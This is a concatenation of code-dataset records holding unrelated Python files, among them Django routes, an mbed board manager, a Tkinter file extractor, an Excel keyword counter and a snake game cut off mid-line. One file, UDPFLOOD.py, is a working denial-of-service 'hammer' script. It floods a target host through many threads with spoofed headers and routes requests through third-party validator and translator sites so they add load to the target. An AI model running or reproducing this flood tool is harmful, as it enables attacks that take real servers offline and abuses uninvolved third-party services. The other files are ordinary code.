10 11\nSample Output31\nExplanationWe print the sum of the array's elements, which is: $1 + 2 + 3 + 4 + 10 + 11 = 31$.\n''' and None\n#!/bin/python\n\nimport sys\n\n\nn = int(raw_input().strip())\narr = map(int,raw_input().strip().split(' '))\n\n\n","sub_path":"algorithms/warmup/simple-array-sum.py","file_name":"simple-array-sum.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"187051009","text":"\"\"\"Realproperty URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom Admin import views as ad\nfrom User import views as us\nurlpatterns = [\n # Admin\n path('admin/', admin.site.urls),\n path('admin-login', ad.login),\n path('admin-login-form/', ad.login_form),\n path('admin-register', ad.register),\n path('admin-register-form/', ad.register_form),\n path('Dashboard/', ad.dashboard),\n path('subscriptio-view-form/', ad.subscriptio_view_form),\n path('submit-subscription-plan', ad.submit_subscription_plan),\n\n # User\n path('', us.index),\n path('user-login', us.user_login_check),\n path('home/', us.home),\n path('sell-property/', us.sell_property),\n path('new-post-form/', us.new_post_form),\n path('property-details-submit', us.property_details_submit),\n path('location-details-submit', us.location_details_submit),\n path('resale-details-submit', us.resale_details_submit),\n path('amenities-submit', us.amenities_submit),\n path('additional-information-submit', us.additional_information_submit),\n path('Schedule-information-submit', us.Schedule_information_submit),\n\n]\n","sub_path":"Realproperty/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"503724141","text":"from __future__ import absolute_import\n\nimport json\nimport os, sys, re\nimport threading\nfrom time import sleep, time\n\nfrom daemon.logger import info, error, warning\nfrom daemon.event_producers.serial_port import serial_connect,\\\n serial_listen,\\\n serial_reset,\\\n get_com_port\n\n\n\n'''\nThis is a list of MbedBoard\n'''\nclass MbedBoards(list):\n\n def get_board(self, board):\n for b in self:\n if board['id'] == b.id:\n return b\n\n def get_board_by_id(self, id):\n for b in self:\n if b.id == id:\n return b\n\n def clone(self):\n return self[:]\n\n def get_ids(self):\n return [b.id for b in self]\n\n def get_connected(self):\n return [b.id for b in self if b.is_connected]\n\n\n\n'''\nRepresentation of an mbed board. This class should be instantiated by any event\nthat implies that an mbed board has been connected. The ID can be the hardware serial ID\nof the board or something made up by the event producers.\n'''\nclass MbedBoard():\n\n def __init__(self, board_info):\n\n assert isinstance(board_info, dict)\n assert 'id' in board_info\n val_or_none = lambda key, d: d[key] if key in d else None\n\n self.id = board_info['id']\n self.serial_id = val_or_none('serial_id', board_info)\n self.dev = val_or_none('dev', board_info)\n self.mnt = val_or_none('mnt', board_info)\n self.com = val_or_none('com', board_info)\n self.model = get_board_model(board_info)\n\n self.resettable = False\n self.mounted = False\n self.connected = True\n\n\n @property\n def info(self):\n return {\n 'id' : self.id,\n 'serial_id' : self.serial_id,\n 'dev' : self.dev,\n 'mnt' : self.mnt,\n 'com' : self.com,\n 'resettable' : self.resettable,\n 'connected' : self.connected,\n 'mounted' : self.mounted,\n 'model' : self.model\n }\n\n def reset(self):\n return serial_reset(self)\n\n def is_connected(self):\n return self.connected\n\n def add_file(self, fpath, fcontent):\n if self.mounted:\n f = open(self.mnt+'/'+fpath, 'w')\n f.write(fcontent)\n f.close()\n return True\n else:\n warning('Not mounted. Can\\'t copy file to board.')\n return False\n\n '''\n Sets up everything needed for serial communication with the device.\n A handler is needed since a separate thread needs to do everything since\n we want to avoid blocking (namely we need timeout because of serial problems).\n '''\n def start_serial_handler(self):\n if not self.com:\n self.com = get_com_port(self.serial_id)\n def handler():\n connected = serial_connect(self)\n if connected:\n serial_listen(self)\n t = threading.Thread(target=handler)\n t.daemon = True\n t.start()\n\n def update(self, info):\n pass\n\n\n\n# --------------------------- Board model ------------------------------\n\n# Models are specified by the four first digits in the serial id of the device\nunofficial_models = {\n '1549' : 'LPC1549 Xpresso v2',\n 'A000' : 'NXP LPC1768',\n '066E' : 'Nucleo F401RE',\n '0672' : 'Nucleo F302R8'\n}\n\nofficial_models = {\n '1010' : 'NXP LPC1768',\n '1040' : 'LPC11U24',\n '9004' : \"LPC1768\",\n '0200' : 'KL25Z',\n '0210' : 'KL05Z',\n '0220' : 'KL46Z',\n '0230' : 'K20D50M',\n '0231' : 'K22F',\n '0240' : 'K64F',\n '0250' : 'KL02Z',\n '0260' : 'KL26Z',\n '9004' : 'LPC1768',\n '1050' : 'LPC800',\n '1070' : 'NRF51822',\n '1080' : 'STM32F103RC',\n '1090' : 'STM32F051',\n}\n\n\n\ndef get_board_model(board_info):\n if 'serial_id' in board_info and board_info['serial_id']:\n prefix = board_info['serial_id'][0:4]\n if prefix in official_models:\n return official_models[prefix]\n if prefix in unofficial_models:\n return unofficial_models[prefix]\n return None\n","sub_path":"daemon/mbedboard.py","file_name":"mbedboard.py","file_ext":"py","file_size_in_byte":4226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"303099048","text":"# listings.py/pyc\n# ---\n# Benjamin Williams\n# <eeu222@bangor.ac.uk>\n# \n#\n\nimport sys\nimport json\nfrom os import listdir\nfrom os.path import isfile, join\n\nlowPath = \"scrn/dense/low\";\nmediumPath = \"scrn/dense/medium\";\nhighPath = \"scrn/dense/high\";\n\nlowDensityFiles = [ f for f in listdir(lowPath) if isfile(join(lowPath,f)) ];\nmediumDensityFiles = [ f for f in listdir(mediumPath) if isfile(join(mediumPath,f)) ];\nhighDensityFiles = [ f for f in listdir(highPath) if isfile(join(highPath,f)) ];\n\noutputData = {\n\t\"low\" : [ \"scrn/dense/low/\" + x for x in lowDensityFiles ],\n\t\"medium\" : [ \"scrn/dense/medium/\" + x for x in mediumDensityFiles ],\n\t\"high\" : [ \"scrn/dense/high/\" + x for x in highDensityFiles ],\n};\n\nencodedData = json.JSONEncoder().encode(outputData);\n\nprint(encodedData);\nfp = open('snapshot.json', 'w+');\nfp.write(json.JSONEncoder().encode(outputData));\nfp.close();","sub_path":"listings.py","file_name":"listings.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"30972151","text":"from . import Reasoner\n\n\"\"\"\nBenefit: JobSeeker Support (eligibility):\nIf applicant.employmentStatus ≠ \"full-time\"\n and 18 ≤ applicant.Age\n and applicant.isNZResident\n and applicant.hasLivedInNZfor2Years\n and applicant.normallyLivesInNZ\n and income.ofApplicantAndSpouse < 570\n and recipient.prepareForEmployment\n then benefit.isJobSeekerSupport is PERMITTED\n\"\"\"\n\n\nclass TestJobSeekerSupport(Reasoner):\n key = 'isJobSeekerSupport'\n\n body = {\n \"applicant\": {\n \"employmentStatus\": \"part-time\",\n \"Age\": 18,\n \"hasLivedInNZfor2Years\": True,\n \"isNZResident\": True,\n \"normallyLivesInNZ\": True\n },\n \"income\": {\n \"ofApplicantAndSpouse\": 550\n },\n \"recipient\": {\n \"prepareForEmployment\": True\n }\n }\n\n def test_reasoning(self):\n self.assertTrue(self.is_conclusive)\n self.assertTrue(self.is_permitted)\n","sub_path":"pytests/test_job_seeker_support.py","file_name":"test_job_seeker_support.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"262458229","text":"\n__author__=\"rojin.varghese\"\n__date__ =\"$Dec 10, 2013 1:46:18 PM$\"\n\nfrom xlrd import open_workbook\nimport re\nfrom xlrd import open_workbook\nimport xlwt\n\n\ncall_id = [];\nkeywordfound = [];\ntemp = []\n\nbook = open_workbook('C:/Documents and Settings/rojin.varghese/Desktop/LargeTest/Total.xls')\nsheet = book.sheet_by_index(0)\n\nbook1 = open_workbook('C:/Documents and Settings/rojin.varghese/Desktop/LargeTest/Keywords.xls')\nsheet1 = book1.sheet_by_index(0)\n\nfor j in range(sheet.nrows):\n line = sheet.cell_value(j,0)\n call_id.append(line);\n line = sheet.cell_value(j,1)\n line = re.sub('[-*>]', '', line)\n line = re.sub('[\\n]', '', line)\n line = line.lower()\n\n for i in range(4):\n line1 = sheet1.cell_value(i,0)\n line1 = line1.lower()\n line1 = re.split(', ', line1)\n\n for x in line1:\n a = len(line)\n b = len(line.replace(x , \"\"))\n c = len(x)\n if (a-b) != 0:\n keywords = (a - b)/c\n keywordfound.append((i,0,j,x,keywords))\n\n line2 = sheet1.cell_value(i,1)\n line2 = line2.lower()\n line2 = re.split(', ', line2)\n\n for x in line2:\n a = len(line)\n b = len(line.replace(x , \"\"))\n c = len(x)\n if (a-b) != 0:\n keywords = (a - b)/c\n keywordfound.append((i,1,j,x,keywords))\n\n line3 = sheet1.cell_value(i,2)\n line3 = line3.lower()\n line3 = re.split(', ', line3)\n\n for x in line3:\n a = len(line)\n b = len(line.replace(x , \"\"))\n c = len(x)\n if (a-b) != 0:\n keywords = (a - b)/c\n keywordfound.append((i,2,j,x,keywords))\n\n line4 = sheet1.cell_value(i,3)\n line4 = line4.lower()\n line4 = re.split(', ', line4)\n\n for x in line4:\n a = len(line)\n b = len(line.replace(x , \"\"))\n c = len(x)\n if (a-b) != 0:\n keywords = (a - b)/c\n keywordfound.append((i,3,j,x,keywords))\n\n line5 = sheet1.cell_value(i,4)\n line5 = line5.lower()\n line5 = re.split(', ', line5)\n\n for x in line5:\n a = len(line)\n b = len(line.replace(x , \"\"))\n c = len(x)\n if (a-b) != 0:\n keywords = (a - b)/c\n keywordfound.append((i,4,j,x,keywords))\n\n\nbook2 = xlwt.Workbook()\nsh1 = book2.add_sheet(\"Catg_TypeA\")\nsh2 = book2.add_sheet(\"Catg_TypeB\")\nsh3 = book2.add_sheet(\"Catg_TypeC\")\nsh4 = book2.add_sheet(\"Catg_TypeD\")\nsh5 = book2.add_sheet(\"Catg_TypeE\")\nsh6 = book2.add_sheet(\"Mastr_TypeA\")\nsh7 = book2.add_sheet(\"Mastr_TypeB\")\nsh8 = book2.add_sheet(\"Mastr_TypeC\")\nsh9 = book2.add_sheet(\"Mastr_TypeD\")\nsh10 = book2.add_sheet(\"Mastr_TypeE\")\nsh11 = book2.add_sheet(\"call_TypeA\")\nsh12 = book2.add_sheet(\"call_TypeB\")\nsh13 = book2.add_sheet(\"call_TypeC\")\nsh14 = book2.add_sheet(\"call_TypeD\")\nsh15 = book2.add_sheet(\"call_TypeE\")\nsh16 = book2.add_sheet(\"Subcall_TypeA\")\nsh17 = book2.add_sheet(\"Subcall_TypeB\")\nsh18 = book2.add_sheet(\"Subcall_TypeC\")\nsh19 = book2.add_sheet(\"Subcall_TypeD\")\nsh20 = book2.add_sheet(\"Subcall_TypeE\")\n\nr1 = r2 = r3 = r4 = r5 = r6 = r7 = r8 = r9 = r10 = 0\nr11 = r12 = r13 = r14 = r15 = r16 = r17 = r18 = r19 = r20 = 0\n\nfor a,b,c,d,e in keywordfound:\n\n if a == 0:\n\n if b == 0:\n sh1.write(r1, 0, d)\n sh1.write(r1, 1, e)\n sh1.write(r1, 2, c)\n r1 = r1+1\n elif b == 1 :\n sh2.write(r2, 0, d)\n sh2.write(r2, 1, e)\n sh2.write(r2, 2, c)\n r2 = r2+1\n elif b == 2 :\n sh3.write(r3, 0, d)\n sh3.write(r3, 1, e)\n sh3.write(r3, 2, c)\n r3 = r3+1\n elif b == 3 :\n sh4.write(r4, 0, d)\n sh4.write(r4, 1, e)\n sh4.write(r4, 2, c)\n r4 = r4+1\n elif b == 4 :\n sh5.write(r5, 0, d)\n sh5.write(r5, 1, e)\n sh5.write(r5, 2, c)\n r5 = r5+1\n book2.save(\"C:/Documents and Settings/rojin.varghese/Desktop/LargeTest/Keyword_numbes.xls\")\n elif a == 1:\n\n if b == 0:\n sh6.write(r6, 0, d)\n sh6.write(r6, 1, e)\n sh6.write(r6, 2, c)\n r6 = r6+1\n elif b == 1 :\n sh7.write(r7, 0, d)\n sh7.write(r7, 1, e)\n sh7.write(r7, 2, c)\n r7 = r7+1\n elif b == 2 :\n sh8.write(r8, 0, d)\n sh8.write(r8, 1, e)\n sh8.write(r8, 2, c)\n r8 = r8+1\n elif b == 3 :\n sh9.write(r9, 0, d)\n sh9.write(r9, 1, e)\n sh9.write(r9, 2, c)\n r9 = r9+1\n elif b == 4 :\n sh10.write(r10, 0, d)\n sh10.write(r10, 1, e)\n sh10.write(r10, 2, c)\n r10 = r10+1\n book2.save(\"C:/Documents and Settings/rojin.varghese/Desktop/LargeTest/Keyword_numbes.xls\")\n elif a == 2:\n \n if b == 0:\n sh11.write(r11, 0, d)\n sh11.write(r11, 1, e)\n sh11.write(r11, 2, c)\n r11 = r11+1\n elif b == 1 :\n sh12.write(r12, 0, d)\n sh12.write(r12, 1, e)\n sh12.write(r12, 2, c)\n r12 = r12+1\n elif b == 2 :\n sh13.write(r13, 0, d)\n sh13.write(r13, 1, e)\n sh13.write(r13, 2, c)\n r13 = r13+1\n elif b == 3 :\n sh14.write(r14, 0, d)\n sh14.write(r14, 1, e)\n sh14.write(r14, 2, c)\n r14 = r14+1\n elif b == 4 :\n sh15.write(r15, 0, d)\n sh15.write(r15, 1, e)\n sh15.write(r15, 2, c)\n r15 = r15+1\n book2.save(\"C:/Documents and Settings/rojin.varghese/Desktop/LargeTest/Keyword_numbes.xls\")\n elif a == 3 :\n\n if b == 0:\n sh16.write(r16, 0, d)\n sh16.write(r16, 1, e)\n sh16.write(r16, 2, c)\n r16 = r16+1\n elif b == 1 :\n sh17.write(r17, 0, d)\n sh17.write(r17, 1, e)\n sh17.write(r17, 2, c)\n r17 = r17+1\n elif b == 2 :\n sh18.write(r18, 0, d)\n sh18.write(r18, 1, e)\n sh18.write(r18, 2, c)\n r18 = r18+1\n elif b == 3 :\n sh19.write(r19, 0, d)\n sh19.write(r19, 1, e)\n sh19.write(r19, 2, c)\n r19 = r19+1\n elif b == 4 :\n sh20.write(r20, 0, d)\n sh20.write(r20, 1, e)\n sh20.write(r20, 2, c)\n r20 = r20+1\n\n book2.save(\"C:/Documents and Settings/rojin.varghese/Desktop/LargeTest/Keyword_numbes.xls\")\n \n\n","sub_path":"Keyword probability finder.py","file_name":"Keyword probability finder.py","file_ext":"py","file_size_in_byte":6586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"137747179","text":"import os\nfrom gym import utils\nfrom gym.envs.robotics import peg_insert_open_to_close\n\n\n# Ensure we get the path separator correct on windows\nMODEL_XML_PATH = os.path.join('fetch', 'peg_insert.xml')\n\n\nclass CamPegInsertOpenToCloseEnv(peg_insert_open_to_close.PegInsertOpenToCloseEnv, utils.EzPickle):\n def __init__(self, reward_type='sparse', goal_type='fixed', cam_type='fixed', gripper_init_type='fixed', act_noise=False, obs_noise=False, depth=False, two_cam=False, use_task_index=False, random_obj=False, train_random=False, test_random=False, limit_dir=False, use_close_loop=False):\n initial_qpos = {\n 'robot0:slide0': 0.405,\n 'robot0:slide1': 0.48,\n 'robot0:slide2': 0.0,\n 'object0:joint': [1.25, 0.53, 0.4, 1., 0., 0., 0.],\n }\n peg_insert_open_to_close.PegInsertOpenToCloseEnv.__init__(\n self, MODEL_XML_PATH, block_gripper=False, n_substeps=20,\n gripper_extra_height=0.5, target_in_the_air=False, target_offset=0.0,\n obj_range=0.03, target_range=0.15, distance_threshold=0.02,\n initial_qpos=initial_qpos, reward_type=reward_type, goal_type=goal_type,\n cam_type=cam_type, gripper_init_type=gripper_init_type, act_noise=act_noise, obs_noise=obs_noise, depth=depth, two_cam=two_cam, use_task_index=use_task_index, random_obj=random_obj, train_random=train_random, test_random=test_random, limit_dir=limit_dir, use_close_loop=use_close_loop)\n utils.EzPickle.__init__(self)\n","sub_path":"gym/envs/robotics/peg_insert/peg_insert_open_to_close.py","file_name":"peg_insert_open_to_close.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"375580816","text":"from tkinter import filedialog\nfrom tkinter import *\nimport shutil\nimport os\nimport datetime\nimport time\nimport argparse\nimport ftplib\n\n\n#######################################################\n#Customized version of fileextractor with Tkinter GUI.#\n#######################################################\ndef search_copy_files(source, destination, extension, logger):\n\tlogger.insert(END,\"Searcning and copying files from Source: \"+source+\" to Destination: \"+destination)\n\tlogger.see(END)\n\tif not os.path.exists(destination):\n\t\tos.makedirs(destination)\n\tfor root, directories, filenames in os.walk(source):\n\t\tfor filename in filenames:\n\t\t\tif extension != None:\n\t\t\t\tif filename.endswith(extension):\n\t\t\t\t\t_copy_file(root,filename,destination,logger)\n\t\t\telse:\n\t\t\t\t_copy_file(root,filename,destination,logger)\n\tlogger.insert(END,\"Finisned copying all files. Please check the destination folder:\"+destination+\"\\n\")\n\tlogger.see(END)\n\ndef _copy_file(root, filename, destination, logger):\n\ttry:\n\t\tshutil.copy(os.path.join(root,filename),destination)\n\texcept Exception as e:\n\t\tlogger.insert(END,e)\n\t\tlogger.see(END)\n\t\tpass\n\tfinally:\n\t\tlogger.insert(END,\"copied \"+os.path.join(destination,filename)+\"\\n\")\n\t\tlogger.see(END)\n\n#############\n#Tkinter GUI#\n#############\ndef src_button():\n\tglobal src_path\n\tfilename = filedialog.askdirectory()\n\tsrc_path.set(filename)\n\t\ndef dest_button():\n\tglobal dest_path\n\tfilename = filedialog.askdirectory()\n\tdest_path.set(filename)\n\ndef run_button():\n\tsearch_copy_files(src_path.get(),dest_path.get(),extension.get(), text)\n\n#main window\nroot = Tk()\nroot.title(\"File Extractor v1.0 | me@kunxia.com\")\nroot.geometry('700x450')\nroot.resizable(False, False)\n\n\n#source directory picker\nsrc_path = StringVar()\nsrc_path.set(\"Please choose the source directory where you want to extract file from\")\nsrcLbl = Label(master=root,textvariable=src_path, anchor='w')\nsrcLbl.grid(row=0, column=2, columnspan=3, sticky=W)\nsrcBtn = Button(text=\"Source Directory\", command=src_button)\nsrcBtn.grid(row=0, column=1)\n\n#destination directory picker\ndest_path = StringVar()\ndest_path.set(\"Please specify the output directory where you want to copy files to\")\ndestLbl = Label(master=root,textvariable=dest_path, anchor='w')\ndestLbl.grid(row=1, column=2, columnspan=5, sticky=W)\ndestBtn = Button(text=\"Output Directory\", command=dest_button)\ndestBtn.grid(row=1, column=1)\n\n#file extension input\nextension = StringVar()\nextLbl = Label(master=root,text=\"File Extension\")\nextLbl.grid(row=3, column=1,sticky=W)\nextBox = Entry(master=root, textvariable=extension)\nextBox.grid(row=3, column=2, sticky=W)\n\n#Run File Extraction\nrunBtn = Button(text=\"Extract Files\", command=run_button)\nrunBtn.grid(row=4, column=2, sticky=W)\n\n#Log output\nlog = StringVar()\ntext = Text(master=root, wrap=WORD)\ntext.tag_configure(\"center\", justify='center')\ntext.grid(row=5,column=2, columnspan=3, sticky=W)\ntext.insert(END, \"File Extrator helps you extract files from the source directory including sub-folders and save them to the output directory.\\n\")\n\nmainloop()\n\n","sub_path":"fileextractorgui.py","file_name":"fileextractorgui.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"5043688","text":"#dos script hammer\r\n#di edit dan di modifikasi daya tempurnya oleh hendrik\r\n#penambahan fitur2 baru\r\n\r\nfrom queue import Queue\r\nfrom optparse import OptionParser\r\nimport time,sys,socket,threading,logging,urllib.request,random\r\ncode = '/NCD/78hJl6TU8LKiogR'\r\ndef user_agent(): #uagent class\r\n\tglobal uagent\r\n\tuagent=[]\r\n\tuagent.append(\"Mozilla/5.0 (Linux; U; Android 4.0.3; es-es; i-Joy-Andromeda Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30\")\r\n\tuagent.append(\"Mozilla/5.0 (Linux; U; Android 4.0.3; en-gb; i-Joy-Andromeda Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30\") \r\n\tuagent.append(\"Mozilla/5.0 (Linux; U; Android 4.0.3; ru-ru; i-Joy-Andromeda Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30\")\r\n\treturn(uagent)\r\n\r\n\r\ndef my_bots(): #bot class\r\n\tglobal bots\r\n\tbots=[]\r\n\tbots.append(\"http://validator.w3.org/check?uri=\")\r\n\tbots.append(\"dfwdiesel.net/check?u=\")\r\n\tbots.append(\"http://host-tracker.com/check_page/?furl=\")\r\n\tbots.append(\"http://jigsaw.w3.org/css-validator/validator?uri=\")\r\n\tbots.append(\"http://www.google.com/translate?u=\")\r\n\tbots.append(\"http://www.webproxy.net/view?q=\")\r\n\tbots.append(\"http://google.com/robots.txt\")\r\n\tbots.append(\"http://host-tracker.com/check_page/?furl=\")\r\n\tbots.append(\"http://www.google.com/translate?u=\")\r\n\tbots.append(\"http://anonymouse.org/cgi-bin/anon-www.cgi/\")\r\n\tbots.append(\"http://www.onlinewebcheck.com/?url=\")\r\n\tbots.append(\"http://feedvalidator.org/check.cgi?url=\")\r\n\tbots.append(\"http://check-host.net/check-http?host=\")\r\n\tbots.append(\"http://checksite.us/?url=\")\r\n\tbots.append(\"http://jobs.bloomberg.com/search?q=\")\r\n\tbots.append(\"http://www.bing.com/search?q=\")\r\n\treturn(bots)\r\n\t\r\ndef rpcs(): #rcps class\r\n global rpcs\r\n rpcs=[]\r\n rpcs.append(\"http://missionglobal.com/xmlrpc.php\")\r\n rpcs.append(\"http://www.formpac.com/xmlrpc.php\")\r\n rpcs.append(\"http://www.tman.ca/hanas/xmlrpc.php\")\r\n rpcs.append(\"http://www.niitsuhome.com/wp/xmlrpc.php\")\r\n rpcs.append(\"https://www.e-publicrealestate.gr/xmlrpc.php\")\r\n return(rpcs)\r\n \r\ndef ntp(): #ntp class\r\n global ntp\r\n ntp=[]\r\n ntp.append(\"194.164.127.5\")\r\n ntp.append(\"216.239.35.8\")\r\n ntp.append(\"128.138.140.44\")\r\n ntp.append(\"139.78.97.128\")\r\n ntp.append(\"138.96.64.10\")\r\n ntp.append(\"200.23.51.102\")\r\n ntp.append(\"193.79.237.14\")\r\n ntp.append(\"194.58.203.20\")\r\n ntp.append(\"194.58.203.148\")\r\n ntp.append(\"208.91.196.74\")\r\n ntp.append(\"194.58.202.148\")\r\n ntp.append(\"192.36.143.151\")\r\n ntp.append(\"193.62.22.98\")\r\n ntp.append(\"192.12.19.20\")\r\n return(ntp)\r\n\r\ndef bot_hammering(url):\r\n\ttry:\r\n\t\twhile True:\r\n\t\t\treq = urllib.request.urlopen(urllib.request.Request(url,headers={'User-Agent': random.choice(uagent)}))\r\n\t\t\tprint(\"\\033[94mBots Refreshing\\033[0m\")\r\n\t\t\ttime.sleep(.1)\r\n\texcept:\r\n\t\ttime.sleep(.1)\r\n\t\t\r\ndef rpcs_hammering(url):\r\n\ttry:\r\n\t\twhile True:\r\n\t\t\treq = urllib.request.urlopen(urllib.request.Request(url,headers={'X-Forwarded-For:': random.choice(rpcs)}))\r\n\t\t\tprint(\"\\033[94m[AI] OPEN NEW SESSION RPCS\")\r\n\t\t\ttime.sleep(.1)\r\n\texcept:\r\n\t\ttime.sleep(.1)\r\n\r\n\r\ndef down_it(item):\r\n\ttry:\r\n\t\twhile True:\r\n\t\t\tpacket = str(\"GET / HTTP/1.1\\nHost: \"+host+\"\\n\\n User-Agent: \"+random.choice(uagent)+\"\\n X-Forwarded-For: \"+random.choice(rpcs)+data).encode('utf-8')\r\n\t\t\ts = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n\t\t\ts.connect((host,int(port)))\r\n\t\t\tif s.sendto( packet, (host, int(port)) ):\r\n\t\t\t\ts.shutdown(1)\r\n\t\t\t\tprint (\"\\033[92m[INFO] ATTACKING FROM : \",random.choice(bots)), print(\"[AI] RPCS :\",random.choice(rpcs))\r\n\t\t\t\ttime.sleep(3) #JARAK JEDA ATTACK 3 DETIK\r\n\t\t\telse:\r\n\t\t\t\ts.shutdown(1)\r\n\t\t\t\tprint(\"\\033[91mshut<->down\\033[0m\")\r\n\t\t\ttime.sleep(.1)\r\n\texcept socket.error as e:\r\n\t\tprint(\"\\033[91m [AI] SERVER OFFLINE??\\033[0m\")\r\n\t\t#print(\"\\033[91m\",e,\"\\033[0m\")\r\n\t\ttime.sleep(.1)\r\n\r\n\r\ndef dos():\r\n\twhile True:\r\n\t\titem = q.get()\r\n\t\tdown_it(item)\r\n\t\tq.task_done()\r\n\r\n\r\ndef dos2():\r\n\twhile True:\r\n\t\titem=w.get()\r\n\t\tbot_hammering(random.choice(bots)+\"http://\"+host)\r\n\t\tw.task_done()\r\n\r\n\r\ndef usage():\r\n print\r\n\r\n\r\ndef get_parameters():\r\n\tglobal host\r\n\tglobal port\r\n\tglobal thr\r\n\tglobal item\r\n\toptp = OptionParser(add_help_option=False,epilog=\"Hammers\")\r\n\toptp.add_option(\"-q\",\"--quiet\", help=\"set logging to ERROR\",action=\"store_const\", dest=\"loglevel\",const=logging.ERROR, default=logging.INFO)\r\n\toptp.add_option(\"-s\",\"--server\", dest=\"host\",help=\"attack to server ip -s ip\")\r\n\toptp.add_option(\"-p\",\"--port\",type=\"int\",dest=\"port\",help=\"-p 80 default 80\")\r\n\toptp.add_option(\"-t\",\"--turbo\",type=\"int\",dest=\"turbo\",help=\"default 135 -t 135\")\r\n\toptp.add_option(\"-h\",\"--help\",dest=\"help\",action='store_true',help=\"help you\")\r\n\topts, args = optp.parse_args()\r\n\tlogging.basicConfig(level=opts.loglevel,format='%(levelname)-8s %(message)s')\r\n\tif opts.help:\r\n\t\tusage()\r\n\tif opts.host is not None:\r\n\t\thost = opts.host\r\n\telse:\r\n\t\tusage()\r\n\tif opts.port is None:\r\n\t\tport = 80\r\n\telse:\r\n\t\tport = opts.port\r\n\tif opts.turbo is None:\r\n\t\tthr = 135\r\n\telse:\r\n\t\tthr = opts.turbo\r\n\r\n\r\n# reading headers\r\nglobal data\r\nheaders = open(\"headers.txt\", \"r\")\r\ndata = headers.read()\r\nheaders.close()\r\n#task queue are q,w\r\nq = Queue()\r\nw = Queue()\r\n\r\n\r\nif __name__ == '__main__':\r\n\tif len(sys.argv) < 2:\r\n\t\tusage()\r\n\tget_parameters()\r\n\tprint(\"\\033[92m[AI] Target : \", host)\r\n\tprint(\"\\033[31;1m[AI] STARTING ATTACK...\\033[0m\")\r\n\ttime.sleep(5)\r\n\tprint(\"\\033[92mCONECTING TO RPCS : \",rpcs)\r\n\tuser_agent()\r\n\tmy_bots()\r\n\trpcs()\r\n\ttime.sleep(5)\r\n\tprint(\"NTP AMPLIFIER DEFAULD CONNECTING :\",ntp)\r\n\ttime.sleep(5)\r\n\ttry:\r\n\t\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\t\ts.connect((host,int(port)))\r\n\t\ts.settimeout(1)\r\n\texcept socket.error as e:\r\n\t\tprint(\"\\033[91m[AI]\",host,\"IP TIDAK DI TEMUKAN\\033[0m\")\r\n\t\tprint(\"\\033[91m[AI] BOT : OFFLINE\")\r\n\t\tprint(\"\\033[91m[AI] NTP AMPLIFIER : OFFLINE\")\r\n\t\tprint(\"\\033[91m[AI] RPCS : OFF MODE\")\r\n\t\tusage()\r\n\twhile True:\r\n\t\tprint(\"ALL TROPS CONNECTED ON 127.0.0.7 SERVER : \",socket.gethostname())\r\n\t\ttime.sleep(3)\r\n\t\tprint(\"BATLLE MODE : ON\")\r\n\t\tprint(\"ATTACK CODE : \",code)\r\n\t\ttime.sleep(3)\r\n\t\tfor i in range(int(thr)):\r\n\t\t\tt = threading.Thread(target=dos)\r\n\t\t\tt.daemon = True # if thread is exist, it dies\r\n\t\t\tt.start()\r\n\t\t\tt2 = threading.Thread(target=dos2)\r\n\t\t\tt2.daemon = True # if thread is exist, it dies\r\n\t\t\tt2.start()\r\n\t\tstart = time.time()\r\n\t\t#tasking\r\n\t\titem = 0\r\n\t\twhile True:\r\n\t\t\tif (item>1800): # for no memory crash\r\n\t\t\t\titem=0\r\n\t\t\t\ttime.sleep(.1)\r\n\t\t\titem = item + 1\r\n\t\t\tq.put(item)\r\n\t\t\tw.put(item)\r\n\t\tq.join()\r\n\t\tw.join()","sub_path":"UDPFLOOD.py","file_name":"UDPFLOOD.py","file_ext":"py","file_size_in_byte":6535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"383585395","text":"from csv import DictReader\n\ndef read(csv_file):\n try:\n try:\n return DictReader(open(csv_file))\n\n except FileNotFoundError:\n print(\"Wrong file or file path\")\n raise\n except OSError:\n print(\"Wrong type\")\n raise ","sub_path":"Day6/test/csvdictionary_test.py","file_name":"csvdictionary_test.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"427202464","text":"import pygame\nimport snake\nimport food\nimport sys\n\n# define game play area & characteristics\nHEIGHT = 20\nWIDTH = 20\nSPEED = 5\nSPEED_TICK = 2\nSPEED_INC = 5\nSHORT = 10\n\nboundaryblock = pygame.Surface((snake.BLOCK_SIZE, snake.BLOCK_SIZE))\nboundaryblock.set_alpha(255)\nboundaryblock.fill((255, 255, 255))\n\n\ndef in_game_boundary(snake):\n head_position = snake.get_head_position()\n return not (head_position[0] 